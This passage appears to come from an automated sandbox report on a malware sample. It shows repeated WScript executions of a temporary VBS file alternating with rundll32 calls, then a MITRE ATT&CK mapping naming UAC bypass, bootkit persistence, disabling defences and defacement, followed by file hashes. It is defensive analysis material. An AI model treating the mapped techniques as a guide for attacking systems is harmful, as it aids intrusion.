- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9684
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9704
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9744
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9752
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9796
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9804
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9872
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9900
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9936
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9992
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10000
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10056
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10068
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10108
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10128
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10168
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10196
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9232
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6348
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9464
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6444
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6532
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9668
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9840
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9900
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10004
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10132
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6252
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9236
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10196
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:9376
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9728
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10000
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10216
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10196
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9756
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:7060
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10216
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10252
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10280
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10312
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10328
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10412
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10440
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10592
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10604
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:10796
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:10984
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11004
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:9732
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11416
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11440
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11508
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11592
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11640
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11656
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11708
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11728
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11796
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11812
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11916
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11948
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12036
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12084
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12112
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12180
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12240
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11292
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12148
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11940
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:11888
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12184
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:8424
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11404
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12128
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11940
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12324
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12340
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12392
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12416
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12464
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12472
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12516
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12528
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12568
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12652
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12688
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12708
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12756
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12764
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12800
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12808
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12844
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12856
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12904
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12912
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12976
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12996
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:13060
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:13072
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:13120
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:13132
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:13180
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:13204
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:13240
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:13252
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:13284
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:13296
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12032
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12336
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12472
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12408
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12604
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:12640
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:12584
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8A0B.tmp\01.vbs"
    3⤵
    PID:5408
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:11612

C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
1⤵
PID:10812

C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
1⤵
PID:10836

C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
1⤵
PID:11012

C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
1⤵
PID:11036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:7732

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fa3855 /state1:0x41c64e6d
1⤵
PID:12780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\6666.txt

Filesize
35B

MD5
bb00af99f0efcd84d4bfdfe8c868a4e2

SHA1
7c0aead84071271fd1e6ae5854512478c1098a83

SHA256
08dedb290a12263e1c4695f5db5ea928d6f39aa30ea310423c39f04986bb70ef

SHA512
51040fec8e063ed0cbaca734dda57e8f05b439588897c8ff72a162ce5af00ddde49286794a1cf6de7cbadd4e44124fc391e439a63a0c295a36686ca8e0bacb0b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
471B

MD5
5a1c8b6db994749bf1db816c60d39b52

SHA1
ff5f09d7697a71d9deec8457145149e6e96028ce

SHA256
31a07dba8984e282ba45c0cbd8d9d83311dd1555337badedf25e3be5f544844d

SHA512
8591ac1a94ded79af2cca7d0b0e4a0e86ccde4ed9677e651af450821cb3f0bbea9fe07a941f64e7e0c9f9130c6f3fc3d63912b9bc157c632f1f2d3947f19b193

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
1f3cbfc822a36810cee9bc8487ceb0cb

SHA1
c53e56198760cbe05b294d4b1e1b549107c7a1a9

SHA256
6a079ec83f0f6e91d044eee7892d09805337a07201188d4040f39076e9166012

SHA512
e3b3825f8f01c3907b0340f7e46da0d2c7556c36c9797c8525f9c855e1a5709c1e4d1dd7dbdaff71dd82d7ccf558341db14d138e700dfb0f1ceabf611efcdb8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\82430006-4297-4d27-afd8-32d34674ecfb.tmp

Filesize
10KB

MD5
fee34391b44bceb1e8e5fe273fba7423

SHA1
56f8dd1fe7ad913167e71675abf24554ed37f886

SHA256
5650c231ee673fb564f793064ac49ccfc6dd284088c26c269992da60bdc8d5b3

SHA512
94a975a8dd821d64f0fede3df375d599fad648f98a90d146005beaf7188929f34083ce462bc25dafd1a79db6d8df719f8b0a0001a66255bcb2d0605703493367

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\96e21081-10f8-408a-8c6a-f9fdbbe1ac3d.tmp

Filesize
6KB

MD5
1491fd0e439bb4fc63124cef1cdfcd0b

SHA1
1e6964a8398cc7640de8bb1158bbbcb04c0bf521

SHA256
311c477091e30c4fbb3d94e66a557ab47fab9e746597270848528f022d0315a3

SHA512
b7873c0adb15b73c01bcc5bb9e16ce7f713d99d5f3ab3a16a33f9c8f0afb5960d6a99eb585823d0b7680ff32c90a6bd4c9edeaca743a43922d45cb5f106a396e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
81620c13457b890948d1a2fabb4f0eb3

SHA1
0a517f6f9b18b316b0b918f8845d7aa884b56b71

SHA256
e9f26f60d1d8d3d194976aecbaa43f82ea893d7d4368d88c88a5c99eaf64ccbf

SHA512
95bd7669b134909198f71c0f32bd32213d9627d65086789f6e477c29293e25b63975ce8c8cbf4d9e723f37aacc0fd6f447643651f3c75f022c969f36435b9e18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
4f5697ba78f377a8f5c3ad15c954d111

SHA1
a957ba224c7a4558ce087f9186bfeb86c407cf3f

SHA256
b3f6e1467863fe5f434295ac1199b7ad5b9409f43374bf9a24a687cfcbeea08e

SHA512
266275ed318b3a0642ea22ba36bd8f44d0e3500a7dfa29cbff22e8a2c47d7941ff5e615721ac2bf5eb0424e8a7a3166be27e07702a3d12fff2987173c813da2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
ed5f4213c17629776cd75510648fc019

SHA1
ebfa685dca9b7c920cd5ad521c03e4ad0ce435b9

SHA256
e969795f0e63ec8a35cdf34d5bc43867ca0825bebfed9734943e69b34ed2ad87

SHA512
71bcc166ae5a48f7a79aa5de7ecc7e10dce22c39240ca9ffe9d0f9340f40fc2a2429529cfee8b2b5d7082efe94921fa7df3454852d5313ff4093bfdffc189627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e3dc2b46a04de519d57d8e9ac61eca52

SHA1
9b41ad2b1a929e083a70dee18d6399016ae3d001

SHA256
a4b972ff8457a3d4f23f70ad7cd0c97b460bd73b1672eab35c8cf0952976b388

SHA512
351ffcc62c9223e86f8d89b2c949f79d68bdce916c275204ac096bf48a0db249d07e6b5866e00b59918e166cd9c20a66eabf9a604c4bb167488e511c9519f125

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
af5763f45b5b210fd27d09ad63a4625a

SHA1
5ae4d74e69e1eb53837e28b66dc74544d0b8de70

SHA256
5eb98295c8317c62d2235f18c8e0da17702774200531c3f2635edd418eb37a0e

SHA512
aa090ff3cecc6fde16846e55056efc4730b6e0c75ff016e74a5d0ac047ae04a5b5debb6dc9ff10db35b60b51016d55995ef672e9f5e799dc7aae40fe483e40ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f3f40402fa3d76be9e272502b38dee71

SHA1
636c965b74e863f1cc3fa05a4202cfe946258e8b

SHA256
d04cc90309da738578541935424563b8dd1880a0490b7ca4eb72dbda41e220e2

SHA512
67f481971c39a9a3720e488f9204e06b93d29e804968236bbe151b36b07c79f8df325f712a62a253abd109e6b30e1346d14116694547782a1a48dcd01d919949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ae71bebed9a94ae293d2ecd105662de9

SHA1
64add76b5b6cc8b5e8b2298b5a723e08c3f47a06

SHA256
4d482818dd2ec237f3338e631e07a6e29bc42aea27184d63d9116d125a4078d3

SHA512
d7b1c67d3cf97c1c97b0db4fe1f68b36878ac7d653f96228241363e5292d40fe1c7119bd99d3e2a5014821c2cde73ad39755789e4e51af52eb09070a9cda23a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
7863252ce2772ba5b4947d0ff8013a19

SHA1
e14eafad6705e1ea99164d90c230cf590386e608

SHA256
fbbd2f26ebb2640f0dbbc31c840fb63548a9dbc3dbcbbb8186105dbf63cc3b1c

SHA512
1deafe545893964e1f371d13177be5be720707e4bfa53b1a61564b5eb37a00d615f7c493ad0a39c2fe0ea13602128b5eba5dbd09e4dc2ddc7ac9f8671419efea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe587644.TMP

Filesize
870B

MD5
